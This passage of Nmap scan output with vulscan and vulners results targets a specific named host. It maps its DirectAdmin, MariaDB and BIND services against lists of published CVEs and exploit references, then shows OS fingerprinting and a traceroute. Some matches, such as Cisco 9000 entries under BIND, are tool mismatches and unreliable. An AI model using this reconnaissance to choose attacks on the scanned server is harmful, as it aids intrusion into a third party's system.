17687| [131477] JBMC DirectAdmin 1.55 /CMD_ACCOUNT_ADMIN cross site request forgery
17688| [112266] JBMC DirectAdmin up to 1.51 email_ftp_password_change Setting memory corruption
17689| [95172] Directadmin Controlpanel 1.50.1 /CMD_SELECT_USERS cross site scripting
17690| [95100] DirectAdmin up to 1.50.1 Crash denial of service
17691| [62578] DirectAdmin 1.403 cross site scripting
17692| [61198] Jbmc-software DirectAdmin 1.403 cross site scripting
17693| [48756] Jbmc-software DirectAdmin up to 1.292 cross site scripting
17694| [48060] Jbmc-software DirectAdmin up to 1.17 privilege escalation
17695| [38747] DirectAdmin 1.30.2 cross site scripting
17696| [37578] DirectAdmin 1.30.1 cross site scripting
17697| [36066] JBMC Software DirectAdmin 1.293 cross site scripting
17698| [35680] Jbmc Software DirectAdmin 1.293 cross site scripting
17699| [33341] JBMC Software DirectAdmin 1.28.1 cross site scripting
17700| [30021] Jbmc Software DirectAdmin 1.26.6 cross site scripting
17701|
17702| MITRE CVE - https://cve.mitre.org:
17703| [CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
17704| [CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters.
17705| [CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request.
17706| [CVE-2009-1526] JBMC Software DirectAdmin before 1.334 allows local users to create or overwrite any file via a symlink attack on an arbitrary file in a certain temporary directory, related to a request for this temporary file in the PATH_INFO to the CMD_DB script during a backup action.
17707| [CVE-2009-1525] CMD_DB in JBMC Software DirectAdmin before 1.334 allows remote authenticated users to gain privileges via shell metacharacters in the name parameter during a restore action.
17708| [CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter.
17709| [CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508.
17710| [CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log
17711| [CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level
17712|
17713| SecurityFocus - https://www.securityfocus.com/bid/:
17714| [83952] DirectAdmin CVE-2006-2153 Cross-Site Scripting Vulnerability
17715| [63911] Installatron Plugin for DirectAdmin Insecure Temporary File Creation Vulnerability
17716| [63373] Installatron Plugin for DirectAdmin cURL Output Remote Privilege Escalation Vulnerability
17717| [62929] DirectAdmin Backup Multiple Security Vulnerabilities
17718| [61017] DirectAdmin Symlink Attack Multiple Remote Privilege Escalation Vulnerabilities
17719| [53281] DirectAdmin Multiple Cross Site Scripting Vulnerabilities
17720| [52848] RETIRED: DirectAdmin 'CMD_DOMAIN' Cross-Site Scripting Vulnerability
17721| [52845] JBMC Software DirectAdmin 'domain' Parameter Cross Site Scripting Vulnerability
17722| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
17723| [47690] DirectAdmin Hard Link Local Privilege Escalation Vulnerability
17724| [38721] DirectAdmin 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability
17725| [35450] DirectAdmin 'CMD_REDIRECT' Cross-Site Scripting Vulnerability
17726| [34678] DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability
17727| [34676] DirectAdmin '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability
17728| [25607] DirectAdmin CMD_BANDWIDTH_BREAKDOWN Cross-Site Scripting Vulnerability
17729| [24688] DirectAdmin Domain Parameter Cross-Site Scripting Vulnerability
17730| [23254] DirectAdmin Logfile HTML Injection Vulnerability
17731| [22996] DirectAdmin CMD_USER_STATS Cross-Site Scripting Vulnerability
17732| [21049] DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
17733|
17734| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17735| [85490] DirectAdmin Backup System email account functionality symlink
17736| [85488] DirectAdmin Backup System symlink
17737| [74569] DirectAdmin CMD_DOMAIN cross-site scripting
17738| [72685] DirectAdmin domain parameter cross-site request forgery
17739| [67254] DirectAdmin MySQL information disclosure
17740| [67253] DirectAdmin hard link privilege escalation
17741| [56875] DirectAdmin name cross-site scripting
17742| [55181] DirectAdmin account cross-site request forgery
17743| [51292] DirectAdmin CMD_REDIRECT cross-site scripting
17744| [50167] DirectAdmin CMD_DB command execution
17745| [49416] DirectAdmin CMD_DB backup action symlink
17746| [36510] DirectAdmin user parameter cross-site scripting
17747| [35177] DirectAdmin domain parameter cross-site scripting
17748| [33390] DirectAdmin log file cross-site scripting
17749| [33023] DirectAdmin CMD_USER_STATS form cross-site scripting
17750| [30256] DirectAdmin user, TYPE, and name parameters cross-site scripting
17751|
17752| Exploit-DB - https://www.exploit-db.com:
17753| [29747] DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting Vulnerability
17754| [29006] DirectAdmin 1.28/1.29 CMD_FTP_SHOW DOMAIN Parameter XSS
17755| [29005] DirectAdmin 1.28/1.29 CMD_EMAIL_LIST name Parameter XSS
17756| [29004] DirectAdmin 1.28/1.29 CMD_EMAIL_VACATION_MODIFY user Parameter XSS
17757| [29003] DirectAdmin 1.28/1.29 CMD_TICKET type Parameter XSS
17758| [29002] DirectAdmin 1.28/1.29 CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
17759| [29001] DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS
17760| [29000] DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS
17761| [28999] DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS
17762| [11813] DirectAdmin 1.34.4 - Multi CSRF vulnerability
17763| [11029] DirectAdmin <= 1.33.6 Symlink Permission Bypass
17764| [10779] DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability
17765|
17766| OpenVAS (Nessus) - http://www.openvas.org:
17767| No findings
17768|
17769| SecurityTracker - https://www.securitytracker.com:
17770| [1028744] DirectAdmin Backup System Flaws Let Local Users Gain Elevated Privileges
17771|
17772| OSVDB - http://www.osvdb.org:
17773| [94899] DirectAdmin Backup System Unspecified Email Account Function Symlink Local Privilege Escalation
17774| [94898] DirectAdmin Backup System Unspecified Symlink Arbitrary File Manipulation Local Privilege Escalation
17775| [80919] DirectAdmin CMD_DOMAIN Multiple Parameter XSS
17776| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
17777| [72119] DirectAdmin Backup Creation Hard Link Check Weakness Local Privilege Escalation
17778| [62914] DirectAdmin CMD_DB_VIEW name Parameter XSS
17779| [61395] DirectAdmin Admin Account Creation CSRF
17780| [55296] DirectAdmin CMD_REDIRECT URL Parameter XSS
17781| [54015] DirectAdmin CMD_DB name Parameter Shell Metacharacter Arbitrary Command Execution
17782| [54014] DirectAdmin CMD_DB Database Backup Request Temporary File Symlink Arbitrary File Overwrite
17783| [36999] DirectAdmin CMD_BANDWIDTH_BREAKDOWN user Parameter XSS
17784| [36339] DirectAdmin CMD_USER_STATS domain Parameter XSS
17785| [34687] DirectAdmin http/ftp XSS Log Viewer Data Injection
17786| [34273] DirectAdmin CMD_USER_STATS RESULT Parameter XSS
17787| [32676] DirectAdmin CMD_FTP_SHOW DOMAIN Parameter XSS
17788| [32675] DirectAdmin CMD_EMAIL_LIST name Parameter XSS
17789| [32674] DirectAdmin CMD_EMAIL_VACATION_MODIFY user Parameter XSS
17790| [32673] DirectAdmin CMD_TICKET type Parameter XSS
17791| [32672] DirectAdmin CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
17792| [32671] DirectAdmin CMD_TICKET_CREATE TYPE Parameter XSS
17793| [32670] DirectAdmin CMD_SHOW_USER user Parameter XSS
17794| [32669] DirectAdmin CMD_SHOW_RESELLER user Parameter XSS
17795| [25138] DirectAdmin HTM_PASSWD domain Parameter XSS
17796|_
3306/tcp open mysql syn-ack MariaDB (unauthorized)
17798| vulscan: VulDB - https://vuldb.com:
17799| [118932] MariaDB on Node.js Environment Variable Backdoor privilege escalation
17800| [112436] MariaDB/XtraDB Cluster Access Restriction event_data_objects.cc privilege escalation
17801| [96814] MariaDB up to 5.5.54/10.0.29/10.1.21/10.2.3 libmysqlclient.so denial of service
17802| [92497] Pivotal Cloud Foundry MariaDB audit_plugin Cleartext information disclosure
17803| [91506] MariaDB Logging my.cnf privilege escalation
17804| [80715] MariaDB up to 5.5.46/10.0.22/10.1.9 sql-common/client.c ssl_verify_server_cert spoofing
17805| [12626] MariaDB 5.5.31 UPDATE Statement denial of service
17806| [12625] MariaDB 5.5.31 JOIN denial of service
17807| [12624] MariaDB 5.5.31 SELECT Statement denial of service
17808| [12623] MariaDB 5.5.31 NAME_CONST Expression denial of service
17809| [12622] MariaDB 5.5.31 KILL QUERY Statement denial of service
17810| [12621] MariaDB 5.5.31 SELECT Statement NULL Pointer Dereference denial of service
17811| [65143] MariaDB up to 5.5.28 MySQL privilege escalation
17812| [63389] MariaDB up to 5.5.25 Replication sql injection
17813|
17814| MITRE CVE - https://cve.mitre.org:
17815| [CVE-2013-1861] MariaDB 5.5.x before 5.5.30, 5.3.x before 5.3.13, 5.2.x before 5.2.15, and 5.1.x before 5.1.68, and Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote attackers to cause a denial of service (crash) via a crafted geometry feature that specifies a large number of points, which is not properly handled when processing the binary representation of this feature, related to a numeric calculation error.
17816| [CVE-2012-5615] MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a, 5.3.11, 5.2.13, 5.1.66, and possibly other versions, generates different error messages with different time delays depending on whether a user name exists, which allows remote attackers to enumerate valid usernames.
17817| [CVE-2012-5614] Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier, and MariaDB 5.5.28a and possibly other versions, allows remote authenticated users to cause a denial of service (mysqld crash) via a SELECT command with an UpdateXML command containing XML with a large number of unique, nested elements.
17818| [CVE-2012-5613] ** DISPUTED ** MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a and possibly other versions, when configured to assign the FILE privilege to users who should not have administrative privileges, allows remote authenticated users to gain privileges by leveraging the FILE privilege to create files as the MySQL administrator. NOTE: the vendor disputes this issue, stating that this is only a vulnerability when the administrator does not follow recommendations in the product's installation documentation. NOTE: it could be argued that this should not be included in CVE because it is a configuration issue.
17819| [CVE-2012-5612] Heap-based buffer overflow in Oracle MySQL 5.5.19 and other versions through 5.5.28, and MariaDB 5.5.28a and possibly other versions, allows remote authenticated users to cause a denial of service (memory corruption and crash) and possibly execute arbitrary code, as demonstrated using certain variations of the (1) USE, (2) SHOW TABLES, (3) DESCRIBE, (4) SHOW FIELDS FROM, (5) SHOW COLUMNS FROM, (6) SHOW INDEX FROM, (7) CREATE TABLE, (8) DROP TABLE, (9) ALTER TABLE, (10) DELETE FROM, (11) UPDATE, and (12) SET PASSWORD commands.
17820| [CVE-2012-5611] Stack-based buffer overflow in the acl_get function in Oracle MySQL 5.5.19 and other versions through 5.5.28, and 5.1.53 and other versions through 5.1.66, and MariaDB 5.5.2.x before 5.5.28a, 5.3.x before 5.3.11, 5.2.x before 5.2.13 and 5.1.x before 5.1.66, allows remote authenticated users to execute arbitrary code via a long argument to the GRANT FILE command.
17821| [CVE-2012-4414] Multiple SQL injection vulnerabilities in the replication code in Oracle MySQL possibly before 5.5.29, and MariaDB 5.1.x through 5.1.62, 5.2.x through 5.2.12, 5.3.x through 5.3.7, and 5.5.x through 5.5.25, allow remote authenticated users to execute arbitrary SQL commands via vectors related to the binary log. NOTE: as of 20130116, Oracle has not commented on claims from a downstream vendor that the fix in MySQL 5.5.29 is incomplete.
17822| [CVE-2012-2122] sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
17823|
17824| SecurityFocus - https://www.securityfocus.com/bid/:
17825| [96162] MariaDB and MySQL CVE-2017-3302 Denial of Service Vulnerability
17826| [85985] MariaDB and MySQL CVE-2015-5969 Local Information Disclosure Vulnerability
17827| [81810] MariaDB/MySQL/Percona Server CVE-2016-2047 SSL Certificate Validation Security Bypass Vulnerability
17828| [65757] MariaDB Prior to 5.5.35 Remote Multiple Denial of Service Vulnerabilities
17829| [65312] MariaDB Remote Multiple Denial of Service Vulnerabilities
17830| [62085] MariaDB Local Multiple Denial of Service Vulnerabilities
17831| [58511] MySQL and MariaDB Geometry Query Denial Of Service Vulnerability
17832| [56837] Oracle MySQL and MariaDB CVE-2012-5627 Insecure Salt Generation Security Bypass Weakness
17833| [56769] Oracle MySQL and MariaDB 'acl_get()' Buffer Overflow Vulnerability
17834| [56750] RETIRED: MariaDB CVE-2012-5579 Buffer Overflow Vulnerability
17835| [55498] MariaDB CVE-2012-4414 Multiple SQL Injection Vulnerabilities
17836| [55460] MariaDB Multiple Denial Of Service Vulnerabilities
17837| [53922] RETIRED: MySQL and MariaDB 'sql/password.c' Authentication Bypass Vulnerability
17838|
17839| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17840| [82895] Oracle MySQL and MariaDB geometry queries denial of service
17841| [80553] Oracle MySQL and MariaDB salt security bypass
17842| [80412] MariaDB unspecified buffer overflow
17843| [78421] MariaDB multiple SQL injection
17844| [78383] MariaDB cache denial of service
17845| [78382] MariaDB select_describe() denial of service
17846| [78381] MariaDB test_if_skip_sort_order() denial of service
17847|
17848| Exploit-DB - https://www.exploit-db.com:
17849| No findings
17850|
17851| OpenVAS (Nessus) - http://www.openvas.org:
17852| No findings
17853|
17854| SecurityTracker - https://www.securitytracker.com:
17855| No findings
17856|
17857| OSVDB - http://www.osvdb.org:
17858| [91416] MariaDB Raw Geometry Object String Conversion Remote DoS
17859| [89050] MariaDB Multiple Unspecified SQL Injection
17860| [88060] MariaDB Unspecified Overflow
17861| [85255] MariaDB Query Cache Parallel Query Parsing Remote DoS
17862| [85254] MariaDB sql/sql_select.cc select_describe() Function In Use Table Freeing Query Parsing Remote DoS
17863| [85253] MariaDB sql_select.cc test_if_skip_sort_order() Function NULL Pointer Dereference Query Parsing Remote DoS
17864| [82823] MariaDB Authentication Protocol Token Comparison Casting Failure Password Bypass
17865|_
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port993-TCP:V=7.70%T=SSL%I=7%D=7/20%Time=5D32CCA6%P=x86_64-pc-linux-gnu
SF:%r(NULL,6A,"\*\x20OK\x20\[CAPABILITY\x20IMAP4rev1\x20SASL-IR\x20LOGIN-R
SF:EFERRALS\x20ID\x20ENABLE\x20IDLE\x20LITERAL\+\x20AUTH=PLAIN\]\x20Doveco
SF:t\x20DA\x20ready\.\r\n");
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
Aggressive OS guesses: Linux 3.10 - 4.11 (94%), Linux 3.18 (91%), Linux 3.2 - 4.9 (91%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 4.10 (90%), Linux 4.2 (90%), Linux 4.4 (90%), Asus RT-AC66U WAP (90%), Linux 3.10 (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:

Uptime guess: 2.198 days (since Wed Jul 17 23:27:38 2019)
Network Distance: 10 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: g16s35.novogara.com; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7

TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 175.24 ms 10.247.200.1
2 176.70 ms 213.184.122.97
3 175.86 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
4 175.79 ms bzq-219-189-185.dsl.bezeqint.net (62.219.189.185)
5 175.85 ms bzq-219-189-2.cablep.bezeqint.net (62.219.189.2)
6 236.45 ms bzq-219-189-73.dsl.bezeqint.net (62.219.189.73)
7 243.79 ms linx-224.retn.net (195.66.224.193)
8 244.27 ms ae0-2.RT.IR9.AMS.NL.retn.net (87.245.232.123)
9 ...
10 236.14 ms 89.248.174.131

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 04:12
Completed NSE at 04:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 04:12
Completed NSE at 04:12, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 474.10 seconds
 Raw packets sent: 77 (6.512KB) | Rcvd: 116 (27.082KB)
17920######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 04:12 EDT
NSE: Loaded 45 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 04:12
Completed NSE at 04:12, 0.00s elapsed
Initiating NSE at 04:12
Completed NSE at 04:12, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 04:12
Completed Parallel DNS resolution of 1 host. at 04:12, 0.03s elapsed
Initiating UDP Scan at 04:12
Scanning idolblog.tv (89.248.174.131) [14 ports]
Discovered open port 53/udp on 89.248.174.131
Completed UDP Scan at 04:12, 6.40s elapsed (14 total ports)
Initiating Service scan at 04:12
Scanning 1 service on idolblog.tv (89.248.174.131)
Completed Service scan at 04:12, 0.24s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against idolblog.tv (89.248.174.131)
Retrying OS detection (try #2) against idolblog.tv (89.248.174.131)
Initiating Traceroute at 04:12
Completed Traceroute at 04:12, 7.20s elapsed
Initiating Parallel DNS resolution of 1 host. at 04:12
Completed Parallel DNS resolution of 1 host. at 04:12, 0.00s elapsed
NSE: Script scanning 89.248.174.131.
Initiating NSE at 04:12
Completed NSE at 04:12, 9.20s elapsed
Initiating NSE at 04:12
Completed NSE at 04:12, 0.00s elapsed
Nmap scan report for idolblog.tv (89.248.174.131)
Host is up (0.23s latency).

PORT STATE SERVICE VERSION
53/udp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
17953| vulners:
17954| cpe:/a:isc:bind:9.9.4:
17955| CVE-2015-4620 7.8 https://vulners.com/cve/CVE-2015-4620
17956| CVE-2014-8500 7.8 https://vulners.com/cve/CVE-2014-8500
17957| CVE-2017-3141 7.2 https://vulners.com/cve/CVE-2017-3141
17958| CVE-2015-8461 7.1 https://vulners.com/cve/CVE-2015-8461
17959| CVE-2013-6230 6.8 https://vulners.com/cve/CVE-2013-6230
17960| CVE-2015-1349 5.4 https://vulners.com/cve/CVE-2015-1349
17961| CVE-2018-5740 5.0 https://vulners.com/cve/CVE-2018-5740
17962| CVE-2017-3145 5.0 https://vulners.com/cve/CVE-2017-3145
17963| CVE-2016-9131 5.0 https://vulners.com/cve/CVE-2016-9131
17964| CVE-2016-8864 5.0 https://vulners.com/cve/CVE-2016-8864
17965| CVE-2016-1286 5.0 https://vulners.com/cve/CVE-2016-1286
17966| CVE-2015-8000 5.0 https://vulners.com/cve/CVE-2015-8000
17967| CVE-2017-3143 4.3 https://vulners.com/cve/CVE-2017-3143
17968| CVE-2017-3142 4.3 https://vulners.com/cve/CVE-2017-3142
17969| CVE-2017-3136 4.3 https://vulners.com/cve/CVE-2017-3136
17970| CVE-2016-2775 4.3 https://vulners.com/cve/CVE-2016-2775
17971| CVE-2016-1285 4.3 https://vulners.com/cve/CVE-2016-1285
17972| CVE-2018-5741 4.0 https://vulners.com/cve/CVE-2018-5741
17973| CVE-2016-6170 4.0 https://vulners.com/cve/CVE-2016-6170
17974|_ CVE-2014-0591 2.6 https://vulners.com/cve/CVE-2014-0591
17975| vulscan: VulDB - https://vuldb.com:
17976| [11804] ISC BIND up to 9.9.4 DNS Query bin/named/query.c query_findclosestnsec3() denial of service
17977| [11104] ISC BIND up to 9.9.4 WSAloctl Winsock API Bypass privilege escalation
17978| [9764] ISC BIND up to 9.9.4 RDATA rdata.c denial of service
17979| [119548] ISC BIND 9.9.12/9.10.7/9.11.3/9.12.1-P2 Recursion information disclosure
17980| [95202] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 DNSSEC denial of service
17981| [95201] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 DS Record Response denial of service
17982| [95200] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 ANY Query Response denial of service
17983| [89850] ISC BIND up to 9.9.9-P1/9.10.4-P1/9.11.0b1 Lightweight Resolution named.conf denial of service
17984| [81312] ISC BIND up to 9.9.8-P3/9.10.3-P3 named db.c/resolver.c Signature Record denial of service
17985| [81311] ISC BIND up to 9.9.8-P3/9.10.3-P3 named alist.c/sexpr.c denial of service
17986| [80787] ISC BIND up to 9.9.8-S4 Query rdataset.c denial of service
17987| [79802] ISC BIND 9.9.0/9.10.0/9.10.1-P1 Socket Error resolver.c denial of service
17988| [79801] ISC BIND 9.9.0/9.10.0/9.10.1-P1 Response db.c denial of service
17989| [76834] ISC BIND up to 9.9.7-P1/9.10.2-P2 TKEY Query Packet Crash denial of service
17990| [8108] ISC BIND up to 9.9.3 on Unix/Linux Regular Expression denial of service
17991| [7079] ISC BIND up to 9.9.1 DNS64 IPv6 Transition Mechanism denial of service
17992| [6295] ISC BIND up to 9.9.1-P2 Assertion Error Resource Record Parser RDATA Query denial of service
17993| [5875] ISC BIND 9.9.0/9.9.1 denial of service
17994| [5874] ISC BIND up to 9.9.1-P1 denial of service
17995| [5483] ISC BIND up to 9.9.1 DNS Resource Record information disclosure
17996|
17997| MITRE CVE - https://cve.mitre.org:
17998| [CVE-2013-4854] The RFC 5011 implementation in rdata.c in ISC BIND 9.7.x and 9.8.x before 9.8.5-P2, 9.8.6b1, 9.9.x before 9.9.3-P2, and 9.9.4b1, and DNSco BIND 9.9.3-S1 before 9.9.3-S1-P1 and 9.9.4-S1b1, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query with a malformed RDATA section that is not properly handled during construction of a log message, as exploited in the wild in July 2013.
17999| [CVE-2013-3919] resolver.c in ISC BIND 9.8.5 before 9.8.5-P1, 9.9.3 before 9.9.3-P1, and 9.6-ESV-R9 before 9.6-ESV-R9-P1, when a recursive resolver is configured, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a record in a malformed zone.
18000| [CVE-2013-2266] libdns in ISC BIND 9.7.x and 9.8.x before 9.8.4-P2, 9.8.5 before 9.8.5b2, 9.9.x before 9.9.2-P2, and 9.9.3 before 9.9.3b2 on UNIX platforms allows remote attackers to cause a denial of service (memory consumption) via a crafted regular expression, as demonstrated by a memory-exhaustion attack against a machine running a named process.
18001| [CVE-2012-5689] ISC BIND 9.8.x through 9.8.4-P1 and 9.9.x through 9.9.2-P1, in certain configurations involving DNS64 with a Response Policy Zone that lacks an AAAA rewrite rule, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for an AAAA record.
18002| [CVE-2012-5688] ISC BIND 9.8.x before 9.8.4-P1 and 9.9.x before 9.9.2-P1, when DNS64 is enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted query.
18003| [CVE-2012-5166] ISC BIND 9.x before 9.7.6-P4, 9.8.x before 9.8.3-P4, 9.9.x before 9.9.1-P4, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P4 allows remote attackers to cause a denial of service (named daemon hang) via unspecified combinations of resource records.
18004| [CVE-2012-4244] ISC BIND 9.x before 9.7.6-P3, 9.8.x before 9.8.3-P3, 9.9.x before 9.9.1-P3, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P3 allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a long resource record.
18005| [CVE-2012-3868] Race condition in the ns_client structure management in ISC BIND 9.9.x before 9.9.1-P2 allows remote attackers to cause a denial of service (memory consumption or process exit) via a large volume of TCP queries.
18006| [CVE-2012-1667] ISC BIND 9.x before 9.7.6-P1, 9.8.x before 9.8.3-P1, 9.9.x before 9.9.1-P1, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P1 does not properly handle resource records with a zero-length RDATA section, which allows remote DNS servers to cause a denial of service (daemon crash or data corruption) or obtain sensitive information from process memory via a crafted record.
18007| [CVE-2011-4313] query.c in ISC BIND 9.0.x through 9.6.x, 9.4-ESV through 9.4-ESV-R5, 9.6-ESV through 9.6-ESV-R5, 9.7.0 through 9.7.4, 9.8.0 through 9.8.1, and 9.9.0a1 through 9.9.0b1 allows remote attackers to cause a denial of service (assertion failure and named exit) via unknown vectors related to recursive DNS queries, error logging, and the caching of an invalid record by the resolver.
18008| [CVE-2011-2465] Unspecified vulnerability in ISC BIND 9 9.8.0, 9.8.0-P1, 9.8.0-P2, and 9.8.1b1, when recursion is enabled and the Response Policy Zone (RPZ) contains DNAME or certain CNAME records, allows remote attackers to cause a denial of service (named daemon crash) via an unspecified query.
18009| [CVE-2011-2464] Unspecified vulnerability in ISC BIND 9 9.6.x before 9.6-ESV-R4-P3, 9.7.x before 9.7.3-P3, and 9.8.x before 9.8.0-P4 allows remote attackers to cause a denial of service (named daemon crash) via a crafted UPDATE request.
18010|
18011| SecurityFocus - https://www.securityfocus.com/bid/:
18012| [61774] ISC BIND 9 SRTT Algorithm Authoritative Server Selection Security Vulnerability
18013| [61479] ISC BIND 9 DNS RDATA Handling CVE-2013-4854 Remote Denial of Service Vulnerability
18014| [58736] ISC BIND 9 'libdns' Remote Denial of Service Vulnerability
18015| [57556] ISC BIND 9 DNS64 CVE-2012-5689 Remote Denial of Service Vulnerability
18016| [56817] ISC BIND 9 DNS64 Remote Denial of Service Vulnerability
18017| [55852] ISC BIND 9 DNS RDATA Handling CVE-2012-5166 Remote Denial of Service Vulnerability
18018| [55522] ISC BIND 9 DNS Resource Records Handling CVE-2012-4244 Remote Denial of Service Vulnerability
18019| [54659] ISC BIND 9 TCP Query Remote Denial of Service Vulnerability
18020| [54658] ISC BIND 9 DNSSEC Validation CVE-2012-3817 Denial of Service Vulnerability
18021| [53772] ISC BIND 9 DNS Resource Records Handling Remote Denial of Service Vulnerability
18022| [50690] ISC BIND 9 Recursive Queries Remote Denial of Service Vulnerability
18023| [48566] ISC BIND 9 Unspecified Packet Processing Remote Denial of Service Vulnerability
18024| [48565] ISC BIND 9 RPZ Configurations Remote Denial of Service Vulnerabilities
18025| [48007] ISC BIND 9 Large RRSIG RRsets Remote Denial of Service Vulnerability
18026| [47734] ISC BIND 9 RRSIG Query Type Remote Denial of Service Vulnerability
18027| [46491] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
18028| [45385] ISC BIND 9 DNSSEC Validation Remote Denial of Service Vulnerability
18029| [45133] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
18030| [41730] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
18031| [37865] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
18032| [37118] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
18033| [35848] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
18034| [25076] ISC BIND 9 Default ACL Settings Recursive Queries And Cached Content Security Bypass Vulnerability
18035| [25037] ISC BIND 9 Remote Cache Poisoning Vulnerability
18036| [4936] ISC BIND 9 Remote Denial Of Service Vulnerability
18037| [100656] Cisco ASR 920 Series Routers CVE-2017-6795 Local Arbitrary File Overwrite Vulnerability
18038| [97450] Cisco ASR 903 and ASR 920 Series CVE-2017-6603 Denial of Service Vulnerability
18039| [93415] Cisco Nexus 9000 Series Switches CVE-2016-1455 Remote Information Disclosure Vulnerability
18040| [82579] Cisco Nexus 9000 Series ACI Mode Switches CVE-2015-6398 Denial of Service Vulnerability
18041| [77686] Cisco Firepower 9000 Series CVE-2015-6380 Unspecified OS Command Injection Vulnerability
18042| [77635] Cisco Firepower 9000 Series CVE-2015-6371 Multiple Arbitrary File Read Vulnerabilities
18043| [77634] Cisco Firepower 9000 Series CVE-2015-6370 Local Command Injection Vulnerability
18044| [77633] Cisco Firepower 9000 Series Switches CVE-2015-6372 HTML Injection Vulnerability
18045| [77631] Cisco Firepower 9000 Series Switches CVE-2015-6374 Clickjacking Vulnerability
18046| [77629] Cisco Firepower 9000 Series CVE-2015-6369 Local Denial of Service Vulnerability
18047| [77628] Cisco Firepower 9000 CVE-2015-6373 Cross Site Request Forgery Vulnerability
18048| [77614] Cisco Firepower 9000 Series Switches CVE-2015-6368 Information Disclosure Vulnerability
18049| [76913] Cisco NX-OS Software for Nexus 9000 Series Switches CVE-2015-6308 Denial of Service Vulnerability
18050| [76791] Cisco ASR 9000 Series Aggregation Services Routers CVE-2015-6301 Denial of Service Vulnerability
